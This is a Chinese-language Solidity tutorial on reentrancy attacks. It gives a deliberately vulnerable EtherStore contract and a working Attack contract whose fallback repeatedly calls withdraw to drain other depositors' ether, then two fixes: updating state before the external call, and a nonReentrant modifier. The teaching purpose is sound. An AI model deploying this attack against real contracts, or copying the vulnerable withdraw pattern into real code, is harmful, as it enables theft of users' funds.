第1节:重入攻击(Re-entry)
小白入门:https://github.com/dukedaily/solidity-expert ,欢迎star转发,文末加V入群。
假设:我们在A合约中调用B合约的方法
重入攻击是指:A合约调用B(恶意合约)结束之前,B(恶意合约)内的函数反向调用A(原合约)的函数实现的攻击。
以下案例是在使用call进行ether转账时,在fallback函数中再次调用了call转账,从而实现攻击效果。
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;
/*
EtherStore is a contract where you can deposit and withdraw ETH.
This contract is vulnerable to re-entrancy attack.
Let's see why.
1. Deploy EtherStore
2. Deposit 1 Ether each from Account 1 (Alice) and Account 2 (Bob) into EtherStore
3. Deploy Attack with address of EtherStore
4. Call Attack.attack sending 1 ether (using Account 3 (Eve)).
You will get 3 Ethers back (2 Ether stolen from Alice and Bob,
plus 1 Ether sent from this contract).
What happened?
Attack was able to call EtherStore.withdraw multiple times before
EtherStore.withdraw finished executing.
Here is how the functions were called
- Attack.attack
- EtherStore.deposit
- EtherStore.withdraw
- Attack fallback (receives 1 Ether)
- EtherStore.withdraw
- Attack.fallback (receives 1 Ether)
- EtherStore.withdraw
- Attack fallback (receives 1 Ether)
*/
contract EtherStore {
mapping(address => uint) public balances;
function deposit() public payable {
balances[msg.sender] += msg.value;
}
function withdraw() public {
uint bal = balances[msg.sender];
require(bal > 0);
(bool sent, ) = msg.sender.call{value: bal}("");
require(sent, "Failed to send Ether");
balances[msg.sender] = 0;
}
// Helper function to check the balance of this contract
function getBalance() public view returns (uint) {
return address(this).balance;
}
}
contract Attack {
EtherStore public etherStore;
constructor(address _etherStoreAddress) {
etherStore = EtherStore(_etherStoreAddress);
}
// Fallback is called when EtherStore sends Ether to this contract.
fallback() external payable {
if (address(etherStore).balance >= 1 ether) {
etherStore.withdraw();
}
}
function attack() external payable {
require(msg.value >= 1 ether);
etherStore.deposit{value: 1 ether}();
etherStore.withdraw();
}
// Helper function to check the balance of this contract
function getBalance() public view returns (uint) {
return address(this).balance;
}
}
解决办法:
- 在调用外部合约之前,优先更新状态变量;
function withdraw() public {
uint bal = balances[msg.sender];
require(bal > 0);
balances[msg.sender] = 0; //<<<=== 提前修改状态变量
(bool sent, ) = msg.sender.call{value: bal}("");
require(sent, "Failed to send Ether");
}
- 使用修饰器,阻止重入攻击
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;
contract ReEntrancyGuard {
bool internal locked;
modifier noReentrant() {
require(!locked, "No re-entrancy");
locked = true;
_;
locked = false;
}
}
contract EtherStore is ReEntrancyGuard {
mapping(address => uint) public balances;
function deposit() public payable {
balances[msg.sender] += msg.value;
}
function withdraw() public noReentrant { //<<<=== 增加修饰器
uint bal = balances[msg.sender];
require(bal > 0);
(bool sent, ) = msg.sender.call{value: bal}("");
require(sent, "Failed to send Ether");
balances[msg.sender] = 0;
}
// Helper function to check the balance of this contract
function getBalance() public view returns (uint) {
return address(this).balance;
}
}
- 原理分析:
正常情况下,转账操作和修改余额的操作应该绑定在一起,即具有原子性。但由于使用call转账时,程序执行被转移到新的地址上了,原本逻辑的原子性受到了破坏,这导致转账发生了但是余额未减少,并且此过程可以不断进行,最终导致攻击者把本不属于自己的余额也转走了。